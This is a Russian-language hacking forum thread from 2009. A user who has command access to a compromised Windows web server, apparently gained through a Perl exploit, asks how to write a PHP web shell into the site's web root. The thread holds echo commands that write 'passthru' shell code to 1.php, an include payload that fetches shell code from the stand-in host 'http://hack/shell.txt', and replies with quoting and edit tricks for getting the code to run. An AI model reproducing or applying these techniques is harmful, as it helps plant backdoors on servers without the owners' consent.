HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

cmd????
  #1  
Старый 06.02.2009, 16:13
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


По умолчанию cmd????

Вопрос такой!
Есть доступ к командной строке на win сервере , через cmd могу выполнять команды , хотел создать файл Php и впихнуть , синтаксис такой

так создается
echo test > "D:\Website\WWW\1.php"


если так вообще ничего не создается
echo <?php passthru $cmd?> > "D:\Website\WWW\1.php"

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"

т.е. на выходе получаю "<?php passthru $cmd?>"
Php на серваке есть!

Как добавить Php код , чтобы он выполнялся!?Желательно <?@include('http://hack/shell.txt');?>

p.s. ftp не предлагать , tftp тоже, не прокатит,Фаер фильтрут выход.!!!

Последний раз редактировалось fly; 06.02.2009 в 16:17..
 
Ответить с цитированием

  #2  
Старый 06.02.2009, 16:18
gold-goblin
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме:
5265510

Репутация: 455


По умолчанию

как выйти именно из этой ситуации я хз..
Попробуй поднять фтп и передать шел =)
 
Ответить с цитированием

  #3  
Старый 06.02.2009, 16:21
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


По умолчанию

gold-goblin

Да не да типичная ситуация, попробуй на своем компе локально создать файл и передать ему php код. Я просто не знаю точного синтаксиса на win
 
Ответить с цитированием

  #4  
Старый 06.02.2009, 16:22
Brain explosion
Banned
Регистрация: 30.01.2009
Сообщений: 28
Провел на форуме:
221135

Репутация: 40
По умолчанию

нах тебе php-шелл, если у тебя уже cmd-шелл?
 
Ответить с цитированием

  #5  
Старый 06.02.2009, 16:26
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Цитата:
fly

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"
edit D:\Website\WWW\1.php
 
Ответить с цитированием

  #6  
Старый 06.02.2009, 16:30
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

а чем кавычки мешают ? он и с ними будет нормально интерпретироваться.
 
Ответить с цитированием

  #7  
Старый 06.02.2009, 16:35
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


По умолчанию

to geezer.code

нет белый фон ""

а в исходники страницы "<?phpinfo();?>"

вообще не в тему Pashkela
 
Ответить с цитированием

  #8  
Старый 06.02.2009, 16:36
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

Цитата:
вообще не в тему Pashkela
почему? У меня работает

сначала залил, точно как ты, а потом edit и убираешь кавычки
 
Ответить с цитированием

  #9  
Старый 06.02.2009, 16:40
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


По умолчанию

)))это локально)) , а у меня через сплоит перловый!
 
Ответить с цитированием

  #10  
Старый 06.02.2009, 16:41
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

а ты сделай "<?php phpinfo();?>" обязательно - php
проверил локально, работает.

"<?phpinfo();?>" тоже выводит ""

Последний раз редактировалось geezer.code; 06.02.2009 в 16:51..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как запустить файл win32 из под cmd? Student :) Болталка 12 03.11.2009 07:53



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.